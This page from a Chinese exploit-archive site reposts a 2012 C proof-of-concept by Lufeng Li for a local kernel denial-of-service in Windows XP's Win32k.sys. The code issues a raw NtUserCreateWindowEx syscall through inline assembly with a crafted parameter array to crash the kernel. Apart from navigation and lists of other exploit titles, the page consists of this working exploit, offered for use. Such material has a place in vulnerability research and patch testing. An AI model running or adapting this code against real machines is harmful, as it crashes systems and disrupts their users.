首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Windows xp Win32k.sys Local Kernel DoS Vulnerability
来源:Neusoft Corporation 作者:LufengLi 发布时间:2012-05-03  

////////////////////////////////////////////////////////////////////////////
//
// Title: Microsoft Windows xp Win32k.sys Local Kernel DoS Vulnerability
// Author: Lufeng Li of Neusoft Corporation
// Vendor: www.microsoft.com
// Vulnerable: Windows xp sp3(full patch)
//
/////////////////////////////////////////////////////////////////////////////

#include <Windows.h>
#include <stdio.h>

void NtUserCreateWindowEx(HANDLE d1,int d2,int d3)
{
 _asm{
  xor eax,eax
  push eax
  push eax
      push eax
      push eax
      push eax
      push eax
      push eax
  push eax
  push eax
      push eax
      push eax
      push eax
      push d3
      push d2
  push d1
  push eax
  mov eax,0x1157
  mov edx,7FFE0300h
  call  dword ptr[edx]
  ret 0x3c
 }
}
void main()
{
 UINT i=0;
 UINT c[]={ 
 0x00000000,0x28001500,0xff7c98cc,0x23ffffff
,0x167c98cc,0x007c98fb,0x02001500,0x78010000
,0x00000000,0x00001500,0x00000000,0x00001500
,0x00000000,0x00001500,0x00000000,0x00000000
,0x00000000,0x00000000,0x34000000,0x3cc00000
,0x5c0007fb,0x617c92f6,0x347c92f6,0x00c00000
,0x00000000,0x18000000,0x000007fb,0xf8000000
,0x200007fd,0x347c92e9,0x02c00000,0x4c000000
 };
  HWND _wnd = CreateWindowEx(WS_EX_TOPMOST,
        "magic",
        "magic",
        WS_POPUP,
        100,
        100,
        100,
        100,
        0,
        0,
        GetModuleHandle( 0 ),
        0);
 NtUserCreateWindowEx(_wnd,0x26,(UINT)c);
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Format Factory v2.95 - Buffer
·OpenConf <= 4.11 (author/edit.
·Symantec pcAnywhere Insecure F
·Solarwinds Storage Manager 5.1
·VLC MMS Stream Handling Buffer
·Mikrotik Router Denial of Serv
·AnvSoft Any Video Converter 4.
·LAN Messenger <= v1.2.28 Denia
·McAfee Virtual Technician MVTC
·Solarwinds Storage Manager 5.1
·SAMSUNG NET-i Viewer 1.37 SEH
·PHP CGI Argument Injection
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved